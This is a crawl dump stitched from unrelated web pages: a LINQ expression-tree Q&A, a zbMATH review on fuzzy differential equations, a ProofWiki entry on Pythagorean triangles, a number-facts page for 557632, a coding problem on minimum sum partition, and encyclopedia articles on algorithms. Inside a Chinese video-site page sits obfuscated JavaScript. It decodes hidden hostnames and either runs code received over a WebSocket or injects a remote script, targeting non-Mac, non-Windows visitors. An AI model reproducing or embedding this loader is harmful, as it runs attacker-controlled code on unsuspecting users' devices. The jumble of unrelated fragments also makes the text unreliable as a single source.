of the term did not arise at all, did it become possible, in the middle of the 20th century, to turn once again to questions of constructivity, this time at a new level, enriched by the emergent concept of the algorithm.
It was this concept which formed the basis of a special constructive trend in mathematics.\n\nThe very word algorithm derives from algoritmi, a Latin transliteration of the Arabic name of al-Khwarizmi, a ninth-century mathematician from the district of Khorezm. In medieval Europe, the term algorism (algorithm) was used for the decimal positional number system and the art of calculating in it, since it was through a 12th-century Latin translation of al-Khwarizmi’s treatise that Europeans first became acquainted with the positional system of notation.\n\nStructure of the algorithmic process. The algorithmic process is one of sequential transformation of constructive entities; it proceeds in discrete steps, each one of which consists in the replacement of a given constructive entity with another. Thus, in applying the algorithm I to the word baaba, we get a succession of words baaba, abaaba, baabab, and so forth. If, say, we apply the algorithm of subtraction by column to the pair <307, 49>, the following succession of constructive entities appears:",
null,
"In this series of sequential constructive objects, each succeeding constructive object is fully determined, within the limits of the given algorithm, by its immediate predecessor. In a stricter approach, it is also assumed that the transition from every constructive object to the one immediately following it is sufficiently “elementary” in the sense that the transformation, in one step, of the preceding constructive object into the following one is of local character. The transformation does not embrace the whole constructive object, but only a portion of it delineated beforehand for the given algorithm, and the transformation itself is determined not by the whole preceding constructive object, but only by this limited portion.\n\nThus, along with sets of possible initial data and possible results, there exists for any algorithm a set of intermediate results which make up the working medium in which the algorithmic process develops. For I, all three sets coincide, but not for the subtraction-by-column algorithm: the possible initial data are pairs of numbers, the possible results are numbers (all in the decimal system), while intermediate results are complex fractions of the type",
null,
"where q is the notation of the number in the decimal system, r is a similar notation or empty word, and ρ is the notation of a number in the decimal system with an allowance for dots over certain digits.\n\nThe functioning of the algorithm begins with a preparatory step in which the possible initial datum is transformed into the initial member of the sequence of intermediate results; this transformation takes place on the basis of a special “rule of beginning” which forms part of the algorithm under consideration. This rule, for I, consists in the application of an identity transformation and, for the subtraction algorithm, in the replacement of the pair <a, b> with the expression",
null,
"Then the “rule of direct processing” is applied, which effects the successive transformation of each arising intermediate result into its successor. These transformations continue until a certain test, to which each intermediate result is subjected as it appears, indicates that a given intermediate result is conclusive; this test is applied on the basis of a special “rule of completion.” For example, for I, the rule of completion consists in verifying whether the intermediate result begins with aa. If the rule of completion does not produce the stop signal for any intermediate result, then the rule of direct processing is either applicable to every arising intermediate result and the algorithmic process continues indefinitely or it is inapplicable to a certain intermediate result and the process is terminated without result. Finally, the final result is extracted from the conclusive intermediate result also on the basis of a special rule; for Entity, this extraction consists in discarding the first two a’s and, for the subtraction algorithm, in discarding everything except the bottom line of digits. In many important cases, the rule of beginning and the rule of extraction of result both assign identical transformations and therefore are not formulated separately. Thus, for every algorithm it is possible to isolate seven (not independent!) parameters that characterize it: (1) the set of possible initial data, (2) the set of possible results, (3) the set of intermediate results, (4) the rule of beginning, (5) the rule of direct processing, (6) the rule of completion, and (7) the rule of extraction of result.\n\n“Refinement” of the concept of the algorithm. Further “refinements” of the concept of the algorithm are possible, and these, strictly speaking, lead to a certain narrowing of the concept. Every such refinement consists in a precise description of a certain class for each of the seven parameters mentioned above—a class within which the given parameter can change. The selection of these classes is what distinguishes one refinement from another. In many refinements, all classes except two—the class of sets of intermediate results and the class of rules of direct processing—are chosen individually; that is, all parameters, except the two exceptions mentioned, are rigidly fixed. Since the seven parameters determine a certain algorithm unambiguously, the choice of the seven classes of variation of these parameters determines a certain class of algorithms. However, such a choice is properly referred to as a “refinement” only if we are convinced that for an arbitrary algorithm having permissible (by the given choice) sets of possible initial data and possible results it is possible to designate an equivalent algorithm taken from the class of algorithms defined by the given choice. This conviction is formulated for each refinement as a basic hypothesis, which, at the present level of our ideas on the matter, cannot be the subject of mathematical proof.\n\nThe first refinements of the type described were proposed in 1936 by the American mathematician E. L. Post and the English mathematician A. M. Turing. Also well known are the refinements formulated by the Soviet mathematicians A. A. Markov and A. N. Kolmogorov. 
The latter proposed treating constructive entities as topological complexes of a specific type; this offered the possibility of explicating the property of “localness” of a transformation. For each of the proposed refinements, the corresponding main hypothesis is in good agreement with practice. Favoring this hypothesis is the fact that, as can be demonstrated, all proposed refinements are in a certain natural sense equivalent to one another.\n\nAs an example (in modernized form), we may take the refinement proposed by Turing. In order to specify a Turing algorithm, we must indicate (1) pairwise nonintersecting alphabets B, D, C, with the letter λ isolated in D and the letters α and ω in C, and (2) a set of pairs of the form <pξ, ηTq>, where p, q ∊ C, ξ, η ∊ B∪D, and T is one of the signs −, 0, +, assuming that in this set (called a program) there are no two pairs with identical first members. The parameters of the algorithm are assigned as follows: possible initial data and possible results are words in B; possible intermediate results are words in B∪D∪C containing not more than one letter from C. The rule of beginning: the initial word P is translated into the word λαPλ. The rule of completion: the final result is the intermediate result containing ω. The rule of extraction of result: the result is decreed to be the sequence of all those letters of the conclusive intermediate result which follows ω and precedes the first letter not contained in B. The rule of direct processing, which translates A into A’, consists in the following: we adjoin the letter λ to A on the right and on the left; then in the word thus formed, we replace the portion of the form εpξ, where p ∊ C, with the word Q by the following rule: in the program, we seek the pair having the first member pξ; let the second member of this pair be ηTq; if T is −, then Q = qεη; if T is 0, then Q = εqη; if T is +, then Q = εηq. The word appearing after this replacement is A’.\n\nV. A. USPENSKII\n\n## algorithm\n\n[′al·gə‚rith·əm]\n(mathematics)\nA set of well-defined rules for the solution of a problem in a finite number of steps.\nMcGraw-Hill Dictionary of Scientific & Technical Terms, 6E, Copyright © 2003 by The McGraw-Hill Companies, Inc.\n\n## Algorithm\n\nA well-defined procedure to solve a problem. The study of algorithms is a fundamental area of computer science. In writing a computer program to solve a problem, a programmer expresses in a computer language an algorithm that solves the problem, thereby turning the algorithm into a computer program. See Computer programming\n\n#### Operation\n\nAn algorithm generally takes some input, carries out a number of effective steps in a finite amount of time, and produces some output. An effective step is an operation so basic that it is possible, at least in principle, to carry it out using pen and paper. In computer science theory, a step is considered effective if it is feasible on a Turing machine or any of its equivalents. A Turing machine is a mathematical model of a computer used in an area of study known as computability, which deals with such questions as what tasks can be algorithmically carried out and what cannot. See Automata theory\n\nMany computer programs deal with a substantial amount of data. In such applications, it is important to organize data in appropriate structures to make it easier or faster to process the data.
In computer programming, the development of an algorithm and the choice of appropriate data structures are closely intertwined, and a decision regarding one often depends on knowledge of the other. Thus, the study of data structures in computer science usually goes hand in hand with the study of related algorithms. Commonly used elementary data structures include records, arrays, linked lists, stacks, queues, trees, and graphs.\n\n#### Applications\n\nMany algorithms are useful in a broad spectrum of computer applications. These elementary algorithms are widely studied and considered an essential component of computer science. They include algorithms for sorting, searching, text processing, solving graph problems, solving basic geometric problems, displaying graphics, and performing common mathematical calculations.\n\nSorting arranges data objects in a specific order, for example, in numerically ascending or descending orders. Internal sorting arranges data stored internally in the memory of a computer. Simple algorithms for sorting by selection, by exchange, or by insertion are easy to understand and straightforward to code. However, when the number of objects to be sorted is large, the simple algorithms are usually too slow, and a more sophisticated algorithm, such as heap sort or quick sort, can be used to attain acceptable performance. External sorting arranges data records stored externally, for example on disk.\n\nSearching looks for a desired data object in a collection of data objects. Elementary searching algorithms include linear search and binary search. Linear search examines a sequence of data objects one by one. Binary search adopts a more sophisticated strategy and is faster than linear search when searching a large array (a sketch is given at the end of this entry). A collection of data objects that are to be frequently searched can also be stored as a tree. If such a tree is appropriately structured, searching the tree will be quite efficient.\n\nA text string is a sequence of characters. Efficient algorithms for manipulating text strings, such as algorithms to organize text data into lines and paragraphs and to search for occurrences of a given pattern in a document, are essential in a word processing system. A source program in a high-level programming language is a text string, and text processing is a necessary task of a compiler. A compiler needs to use efficient algorithms for lexical analysis (grouping individual characters into meaningful words or symbols) and parsing (recognizing the syntactical structure of a source program). See Software engineering\n\nA graph is useful for modeling a group of interconnected objects, such as a set of locations connected by routes for transportation. Graph algorithms are useful for solving those problems that deal with objects and their connections—for example, determining whether all of the locations are connected, visiting all of the locations that can be reached from a given location, or finding the shortest path from one location to another.\n\nMathematical algorithms are of wide application in science and engineering. Basic algorithms for mathematical computation include those for generating random numbers, performing operations on matrices, solving simultaneous equations, and numerical integration. Modern programming languages usually provide predefined functions for many common computations, such as random number generation, logarithm, exponentiation, and trigonometric functions.\n\nIn many applications, a computer program needs to adapt to changes in its environment and continue to perform well.
An approach to make a computer program adaptive is to use a self-organizing data structure, such as one that is reorganized regularly so that those components most likely to be accessed are placed where they can be most efficiently accessed. A self-modifying algorithm that adapts itself is also conceivable. For developing adaptive computer programs, biological evolution has been a source of ideas and has inspired evolutionary computation methods such as genetic algorithms. See Genetic algorithms\n\nCertain applications require a tremendous amount of computation to be performed in a timely fashion. An approach to save time is to develop a parallel algorithm that solves a given problem by using a number of processors simultaneously. The basic idea is to divide the given problem into subproblems and use each processor to solve a subproblem. The processors usually need to communicate among themselves so that they may cooperate. The processors may share memory, through which they can communicate, or they may be connected by communication links into some type of network such as a hypercube. See Concurrent processing, Multiprocessing, Supercomputer\n\nMcGraw-Hill Concise Encyclopedia of Engineering. © 2002 by The McGraw-Hill Companies, Inc.\n\n## algorithm\n\n1. a logical arithmetical or computational procedure that if correctly applied ensures the solution of a problem\n2. Logic Maths a recursive procedure whereby an infinite sequence of terms can be generated\nCollins Discovery Encyclopedia, 1st edition © HarperCollins Publishers 2005\n\n## algorithm\n\n(algorithm, programming)\nA detailed sequence of actions to perform to accomplish some task. Named after the Iranian mathematician, Mohammed Al-Khawarizmi.\n\nTechnically, an algorithm must reach a result after a finite number of steps, thus ruling out brute force search methods for certain problems, though some might claim that brute force search was also a valid (generic) algorithm. The term is also used loosely for any sequence of actions (which may or may not terminate).\n\nPaul E. Black's Dictionary of Algorithms, Data Structures, and Problems.\n\n## algorithm\n\nA set of ordered steps for solving a problem, such as a mathematical formula or the instructions in a program. The terms algorithm and \"program logic\" are synonymous, as both refer to a sequence of steps to solve a problem. However, an algorithm often implies a more complex problem rather than the input-process-output logic of typical business software. See encryption algorithm.\nCopyright © 1981-2019 by The Computer Language Company Inc. All Rights reserved. THIS DEFINITION IS FOR PERSONAL USE ONLY. All other reproduction is strictly prohibited without permission from the publisher.\n\nReferences in periodicals archive:\n\nFigure 2(a) shows a sample XML document and its corresponding fragment of XML streams stored in the eleTable generated during the createINLAB encoding algorithm. Likewise, figure 2(b) depicts the fragment of PCTable generated.\n\nRegarding analysis of TEK exchange in PKMv1, we know that if an attacker manipulated the value of the encoding set in the middle of the road, SS would probably be led in a direction where it does not use an identification strategy and/or uses a weak encoding algorithm. To solve this problem, SS should send its security facilities and capability in the SA-TEK-Request message.\n\nJiang, et al, \"Virtual view synthesis oriented fast depth video encoding algorithm,\" 2010 2nd International Conf.\n\nBy combining this with the \"ultra high quality and ultra low delay encoding algorithm,\" high quality video can be implemented through low bit rate transmissions.\n\nFor example, compared with the pure source multicast scenarios of the spanning tree with n number of nodes, the encoding ratio (n - 2) of the Prufer sequence algorithm used in DSM can be slightly better than our LCRS-based serialized path encoding algorithm (n - 1 + number of branch delimiters).\n\nIn the H.264 encoding algorithm, Bigasoft utilizes the new advanced CPU command to better take advantage of CPU processing, thus increasing the H.264 encoding speed to 5X faster and preserving the video and audio quality.\n\nThe IP Link 200A is designed to allow broadcasters to interconnect studios and remote locations, including transmitter sites, using the AES67 standard and any of today's encoding algorithms across wide-area IP networks.\n\nCABAC is notable for providing much better compression than most other entropy encoding algorithms used in video encoding, and it is one of the key elements that provide the H.264/AVC encoding scheme with better compression capability than its predecessors.\n\nPractical network coding schemes are aiming to increase throughput; what is vital is to design encoding algorithms and make decisions.\n\nIn earlier works, there were many bus encoding algorithms aiming to reduce the power dissipation on interfaces by mapping the information on IOs or signals to a form which has less transition activity than the original, such as the bus-invert encoding [12, 13], gray code, serial T0, and combined bus-invert and T0 technology.\n\nTraditionally accustomed to broadcaster-scheduled \"appointment viewing\", consumers today demand \"prime time on my time.\" Moreover, the fixed location viewing in the family room, or perhaps on a PC, is replaced by growing expectations of a proliferation of mobile devices capable of receiving streamed IP video, encouraged by more efficient encoding algorithms and streaming protocols."
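As a concrete illustration of the binary search strategy described in the encyclopedia entry above, here is a minimal Python sketch on a sorted array; each comparison halves the portion of the array still under consideration, which is why it outperforms linear search on large arrays:

```python
def binary_search(items, target):
    lo, hi = 0, len(items) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if items[mid] == target:
            return mid            # found: return the index
        if items[mid] < target:
            lo = mid + 1          # target can only be in the upper half
        else:
            hi = mid - 1          # target can only be in the lower half
    return -1                     # not present

print(binary_search([2, 3, 5, 8, 13, 21], 13))   # -> 4
```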
] | [
null,
"https://img.tfd.com/ggse/ae/gsed_0001_0001_0_img0055.png",
null,
"https://img.tfd.com/ggse/7e/gsed_0001_0001_0_img0056.png",
null,
"https://img.tfd.com/ggse/d5/gsed_0001_0001_0_img0057.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9307323,"math_prob":0.9376649,"size":24411,"snap":"2020-34-2020-40","text_gpt3_token_len":4822,"char_repetition_ratio":0.16036382,"word_repetition_ratio":0.011840411,"special_character_ratio":0.18733358,"punctuation_ratio":0.10432802,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97867644,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,10,null,10,null,10,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T12:41:27Z\",\"WARC-Record-ID\":\"<urn:uuid:85d786ba-81c0-49f5-b507-3b5dcbefc279>\",\"Content-Length\":\"75062\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:406fb836-6f67-40cf-a9e6-d54b0987b5bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac3a2b72-b729-4834-b79c-78dcefc80a38>\",\"WARC-IP-Address\":\"85.195.124.227\",\"WARC-Target-URI\":\"https://encyclopedia2.thefreedictionary.com/Encoding+Algorithm\",\"WARC-Payload-Digest\":\"sha1:BWSUE2UHHUOS3G6AX3WTKV7WLVPA3VKT\",\"WARC-Block-Digest\":\"sha1:FSFKQXA3YULZ5BFSWEAYZHE65RH5ESUF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401600771.78_warc_CC-MAIN-20200928104328-20200928134328-00076.warc.gz\"}"} |
https://www.banking24seven.com/loan-interest-formula-will-help-you-calculate-your-emi-with-ease/ | [
"",
null,
"",
null,
"You Might Be Interested In\n\nThe loan is an amount of money that is borrowed from a lender that is expected to be paid back with interest. The one who borrows the loan is the borrower and the lender can be an individual, bank or any financial institution. The lender pays the entire amount on behalf of the borrower. The borrower, on the other hand, pays monthly installments to the lender towards the principal amount and interest too over the amount. Interest is the cost of using someone else’s money. It is seen as a compensation to the lender who takes the risk to lend you the money in simple terms. There is a way to determine the loan interest formula for your EMI.\nThe amount of interest on your loan depends on three things\n-The amount of loan\n-The interest rate\n-A time duration of the loan\nA long term loan or a higher interest means that the borrower has to pay more to repay the loan. Most banks and financial institution use compound interest to determine your loan interest.\nIn the day of computers and laptops, an excel spreadsheet is the easiest way to calculate the loan interest formula. The loan interest formula is calculated by PMT which includes three variables, these are a rate of interest (rate), number of periods (per) and, lastly, the value of the loan or present value (PV).\nEMI = PMT (rate,per,PV)\nThe rate of interest used in the formula should be the monthly rate\nThe number of EMI’s is represented by the number of periods.\nThe result is usually in the red or in negative which is indicative of the cash outflow of the borrower.\nWhen using a calculator or just plain mathematics the formula for calculating EMI is as follows\nEMI = [P x R x (1+R)^N]/[(1+R)^N-1], where P stands for the loan amount or principal, R is the interest rate per month [if the interest rate per annum is 11%, then the rate of interest will be 11/(12 x 100)], and N is the number of monthly installments. When you use the above formula, you will get the same result that you will get in the Excel spreadsheet.\nEach EMI repays a part of the due amount i.e. the principal and the interest due on the loan amount. With the help of a loan interest formula, you can plan wisely and meet your financial needs. It’s easier to plan in advance and pay off the loan amount in due time to avoid getting into a debt trap.\n\nWe use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it. OK Read Privacy & Cookies Policy"
] | [
null,
"http://b.scorecardresearch.com/p",
null,
"https://www.banking24seven.com/wp-content/themes/soledad/images/penci-holder.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9463097,"math_prob":0.97091013,"size":2999,"snap":"2021-43-2021-49","text_gpt3_token_len":656,"char_repetition_ratio":0.17963272,"word_repetition_ratio":0.41970804,"special_character_ratio":0.21540514,"punctuation_ratio":0.07540984,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995243,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-19T03:47:01Z\",\"WARC-Record-ID\":\"<urn:uuid:972c7ef7-cf7d-4c86-8979-424ba48a144f>\",\"Content-Length\":\"155394\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a8755cb1-d40e-4c70-833b-a2d269eccdae>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b296314-a6c9-4cf6-818d-f9e27da810f9>\",\"WARC-IP-Address\":\"159.65.156.155\",\"WARC-Target-URI\":\"https://www.banking24seven.com/loan-interest-formula-will-help-you-calculate-your-emi-with-ease/\",\"WARC-Payload-Digest\":\"sha1:RUS4EQSDB5E43SYBRP7ZCUFTAJK2GJTN\",\"WARC-Block-Digest\":\"sha1:QE6STUSQ5C3J5F4OWKJNYM62ZMIN4DNC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585231.62_warc_CC-MAIN-20211019012407-20211019042407-00413.warc.gz\"}"} |
https://thecshandbook.com/Topological_Sorting | [
"## Introduction\n\nPrerequisites: Graph Theory, Depth First Search\n\nA topological sort or topological order of a directed graph is an order in which every node comes after its ancestors.",
null,
"For example topological orders could be:\n\n• (A, B, C, D, E, F, G)\n• (B, A, D, C, F, E, G)\n• (B, A, D, G, F, C, E)\n\nBut (B, A, C, F, D, E, G) is not a topological ordering because D is an ancestor of F and it comes after F.\n\n## Implementation\n\nTopological sort can implemented in O(n) time using DFS for a directed acyclic graph (a digraph with no cycles). How it works:\n\n2. Pick any unmarked node.\n3. Get the DFS preordering from that node for unvisited nodes.\n5. Mark every node that has been visited.",
null,
"Example:\n\n• Pick C\n• DFS preorder from C is (C,E)"
] | [
null,
"https://thecshandbook.com/public_html/img/uploads/topsort.png",
null,
"https://thecshandbook.com/public_html/img/uploads/topsort.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8758359,"math_prob":0.69846046,"size":1276,"snap":"2023-40-2023-50","text_gpt3_token_len":365,"char_repetition_ratio":0.17924528,"word_repetition_ratio":0.02734375,"special_character_ratio":0.28683385,"punctuation_ratio":0.18412699,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9730745,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T05:46:53Z\",\"WARC-Record-ID\":\"<urn:uuid:44943bf5-383f-4bdb-8444-9d0059fb807d>\",\"Content-Length\":\"8903\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e71120a5-28a6-461c-942e-67cee738798a>\",\"WARC-Concurrent-To\":\"<urn:uuid:9f337033-ba38-42f2-a68d-85f81f1d45d2>\",\"WARC-IP-Address\":\"104.21.86.71\",\"WARC-Target-URI\":\"https://thecshandbook.com/Topological_Sorting\",\"WARC-Payload-Digest\":\"sha1:QTP35K6BQWSGOGXBYZQGDOGSJPQCGC4M\",\"WARC-Block-Digest\":\"sha1:APADCNKSZFMYXDY2RJQABWD57ZGTUDBM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100276.12_warc_CC-MAIN-20231201053039-20231201083039-00029.warc.gz\"}"} |
https://reposcope.com/man/en/3p/expm1 | [
"Linux repositories inspector\n\n# expm1(3p)\n\nIEEE/The Open Group\n2013\nAliases: expm1f(3p), expm1l(3p)\n\n### man-pages\n\nLinux kernel and C library user-space interface documentation\n\n### man-pages-posix\n\nPOSIX Manual Pages\n\n## PROLOG\n\nThis manual page is part of the POSIX Programmer’s Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.\n\n## NAME\n\nexpm1, expm1f, expm1l — compute exponential functions\n\n## SYNOPSIS\n\n```#include <math.h>\n\ndouble expm1(double x);\nfloat expm1f(float x);\nlong double expm1l(long double x);\n```\n\n## DESCRIPTION\n\nThe functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1-2008 defers to the ISO C standard.\nThese functions shall compute ex-1.0.\nAn application wishing to check for error situations should set errno to zero and call feclearexcept(FE_ALL_EXCEPT) before calling these functions. On return, if errno is non-zero or fetestexcept(FE_INVALID | FE_DIVBYZERO | FE_OVERFLOW | FE_UNDERFLOW) is non-zero, an error has occurred.\n\n## RETURN VALUE\n\nUpon successful completion, these functions return ex-1.0.\nIf the correct value would cause overflow, a range error shall occur and expm1(), expm1f(), and expm1l() shall return the value of the macro HUGE_VAL, HUGE_VALF, and HUGE_VALL, respectively.\nIf x is NaN, a NaN shall be returned.\nIf x is ±0, ±0 shall be returned.\nIf x is -Inf, -1 shall be returned.\nIf x is +Inf, x shall be returned.\nIf x is subnormal, a range error may occur\nand x should be returned.\nIf x is not returned, expm1(), expm1f(), and expm1l() shall return an implementation-defined value no greater in magnitude than DBL_MIN, FLT_MIN, and LDBL_MIN, respectively.\n\n## ERRORS\n\nThese functions shall fail if:\n Range Error The result overflows. If the integer expression (math_errhandling & MATH_ERRNO) is non-zero, then errno shall be set to [ERANGE]. If the integer expression (math_errhandling & MATH_ERREXCEPT) is non-zero, then the overflow floating-point exception shall be raised.\nThese functions may fail if:\n Range Error The value of x is subnormal. If the integer expression (math_errhandling & MATH_ERRNO) is non-zero, then errno shall be set to [ERANGE]. If the integer expression (math_errhandling & MATH_ERREXCEPT) is non-zero, then the underflow floating-point exception shall be raised.\nThe following sections are informative.\n\nNone.\n\n## APPLICATION USAGE\n\nThe value of expm1(x) may be more accurate than exp(x)-1.0 for small values of x.\nThe expm1() and log1p() functions are useful for financial calculations of ((1+x)n-1)/x, namely:\n```\nexpm1(n * log1p(x))/x\n```\nwhen x is very small (for example, when calculating small daily interest rates). These functions also simplify writing accurate inverse hyperbolic functions.\nFor IEEE Std 754-1985 double, 709.8 < x implies expm1( x) has overflowed.\nOn error, the expressions (math_errhandling & MATH_ERRNO) and (math_errhandling & MATH_ERREXCEPT) are independent of each other, but at least one of them must be non-zero.\n\nNone.\n\nNone."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.76889795,"math_prob":0.91949797,"size":4192,"snap":"2019-51-2020-05","text_gpt3_token_len":1031,"char_repetition_ratio":0.11389685,"word_repetition_ratio":0.11488673,"special_character_ratio":0.23449427,"punctuation_ratio":0.1432258,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9874893,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-06T12:26:23Z\",\"WARC-Record-ID\":\"<urn:uuid:2afd2ccc-3979-44e2-9356-068063916af1>\",\"Content-Length\":\"10745\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a4d38a2f-bca9-4599-a991-cd27e7c83892>\",\"WARC-Concurrent-To\":\"<urn:uuid:4cc34034-e995-44fd-a810-5fb3a78fa1f9>\",\"WARC-IP-Address\":\"80.79.17.135\",\"WARC-Target-URI\":\"https://reposcope.com/man/en/3p/expm1\",\"WARC-Payload-Digest\":\"sha1:LHG72DLABC74P6LSGSJD3XCWSF7LHTCQ\",\"WARC-Block-Digest\":\"sha1:3LMWMPOH6TB2KPTSZOF6NPGF7YEYFR27\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540488620.24_warc_CC-MAIN-20191206122529-20191206150529-00150.warc.gz\"}"} |
https://socratic.org/questions/597cae97b72cff300c577dac | [
"# If a buffer contains \"0.110 M\" weak base and \"0.440 M\" of the weak conjugate acid, what is the \"pH\"? The \"pK\"_b is 4.96.\n\nJul 30, 2017\n\n$\\text{pH} = 8.44$\n\n#### Explanation:\n\nThis looks like a job for the Henderson - Hasselbalch equation, which for a weak base/conjugate acid buffer looks like this\n\n\"pH\" = 14 - overbrace([\"p\"K_b + log( ([\"conjugate acid\"])/([\"weak base\"]))])^(color(blue)(\"the pOH of the buffer solution\"))\n\nAs you know, you have\n\n$\\text{p} {K}_{b} = - \\log \\left({K}_{b}\\right)$\n\nIn your case, you know that the buffer contains $\\text{0.110 M}$ of the weak base and $\\text{0.440 M}$ of its conjugate acid, so even without doing any calculations, you should be able to say that the $\\text{pOH}$ of the buffer will be higher than the $\\text{p} {K}_{b}$ of the weak base.\n\nIn other words, the $\\text{pH}$ of the buffer will be lower than $14 - \\text{p} {K}_{b}$, what you would get for a $\\text{pOH}$ equal to the $\\text{p} {K}_{b}$ of the weak base.\n\nPlug in your values into the Henderson - Hasselbalch equation to find\n\n\"pH\" = 14 - [-log(1.1 * 10^(-5)) + log((0.440 color(red)(cancel(color(black)(\"M\"))))/(0.110color(red)(cancel(color(black)(\"M\")))))]\n\n$\\textcolor{\\mathrm{da} r k g r e e n}{\\underline{\\textcolor{b l a c k}{\\text{pH} = 8.44}}}$\n\nThe answer is rounded to two decimal places, the number of sig figs you have for the base dissociation constant.\n\nJul 30, 2017\n\nStefan has a good answer, but I thought I'd give another approach to this. For buffers (i.e. weak acid + conjugate base, weak base + conjugate acid), the Henderson-Hasselbalch equation applies.\n\nTo make it so I only have to know one Henderson-Hasselbalch equation, I use the ${\\text{pK}}_{a}$ one and recall the relationships to interconvert between ${\\text{pK}}_{a}$, ${\\text{pK}}_{b}$, $\\text{pH}$, and $\\text{pOH}$.\n\n\"pH\" = \"pK\"_a + log\\frac([\"A\"^(-)])([\"HA\"])\n\nUsing the idea that ${\\text{pK\"_a + \"pK}}_{b} = 14$, we get:\n\n$- \\log \\left({K}_{b}\\right) = {\\text{pK}}_{b} = - \\log \\left(1.1 \\times {10}^{- 5}\\right) = 4.96$\n\n$\\implies {\\text{pK}}_{a} = 14 - 4.96 = 9.04$\n\nAnd thus, noting the difference in notation (treating the base as ${\\text{A}}^{-}$ or $\\text{B}$ and the conjugate acid as $\\text{HA}$ or ${\\text{BH}}^{+}$), the $\\text{pH}$ is alternatively found as:\n\ncolor(blue)(\"pH\") = 9.04 + log ((\"0.110 M\")/(\"0.440 M\"))\n\n$= 9.04 - \\log 4 = \\textcolor{b l u e}{8.44}$\n\nAnd this makes physical sense, as we started with a weak base, whose conjugate acid dissociates less (${K}_{a} < {K}_{b}$ if ${K}_{b} > {10}^{- 7}$ at ${25}^{\\circ} \\text{C}$ and $\\text{1 atm}$).\n\nFurthermore, there is a higher concentration of conjugate acid than the weak base. So, we should expect the $\\text{pH}$ to be basic, but also more acidic than the ${\\text{pK}}_{a}$ of the conjugate acid.\n\nAPPENDIX\n\nAnd just so you see, this gives the same equation Stefan has. 
Recall that:\n\n• At ${25}^{\circ} \text{C}$ and $\text{1 atm}$, $\text{p}K_a + \text{p}K_b = 14 = \text{p}K_w$\n• $\log \left(\frac{a}{b}\right) = - \log \left(\frac{b}{a}\right)$\n\nTherefore:\n\n$\text{pH} = (14 - \text{p}K_b) + \log \frac{[\text{A}^-]}{[\text{HA}]} = (14 - \text{p}K_b) - \log \frac{[\text{HA}]}{[\text{A}^-]} = 14 - \left[\text{p}K_b + \log \frac{[\text{HA}]}{[\text{A}^-]}\right]$\n\nwhich is what Stefan used.\n\nWith slightly changed notation, and knowing that $\text{pH} + \text{pOH} = 14$ at ${25}^{\circ} \text{C}$ and $\text{1 atm}$, we can get the other form of the Henderson-Hasselbalch equation:\n\n$\text{pH} = 14 - \overbrace{\left[\text{p}K_b + \log \frac{[\text{BH}^+]}{[\text{B}]}\right]}^{\text{pOH}} = 14 - \text{pOH}$\n\nThus,\n\n$\boxed{\text{pOH} = \text{p}K_b + \log \frac{[\text{BH}^+]}{[\text{B}]}}$\n\n(A numeric check of this formula appears after this record.)"
] | [
null
